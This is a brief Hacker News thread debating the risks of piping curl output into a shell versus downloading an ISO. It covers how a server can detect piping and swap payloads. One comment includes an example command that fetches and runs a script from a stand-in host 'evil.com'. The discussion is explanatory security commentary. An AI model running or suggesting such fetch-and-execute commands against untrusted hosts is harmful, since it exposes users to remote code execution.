Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

You can actually detect from the server side if curl is being piped and dynamically change the payload.


Yes! I'm not sure how that changes what I'm saying. If you don't trust the server, it can give you a malicious ISO, too.

Or are you saying that you audit the bits of the ISO yourself before burning it?


Woah. How? Assume scrubber request headers.


latency/buffer size/stalling effects. It's the difference between `curl evil.com/installer.sh | sh` and `curl evil.com/installer.sh | cat > installer.sh`.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: